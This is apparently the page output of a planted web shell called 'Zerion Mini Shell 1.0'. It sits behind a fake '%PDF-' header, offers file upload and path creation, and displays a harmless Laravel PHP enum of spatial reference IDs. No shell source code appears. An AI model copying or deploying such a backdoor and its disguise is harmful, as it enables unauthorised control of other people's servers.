%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/loslex/demo/vendor/asanikovich/laravel-spatial/src/Enums/
Upload File :
Create Path :
Current File : /www/loslex/demo/vendor/asanikovich/laravel-spatial/src/Enums/Srid.php

<?php

namespace ASanikovich\LaravelSpatial\Enums;

enum Srid: int
{
    case WGS84 = 4326; // https://epsg.org/crs_4326/WGS-84.html
    case WEB_MERCATOR = 3857; //https://epsg.org/crs_3857/WGS-84-Pseudo-Mercator.html
}

Zerion Mini Shell 1.0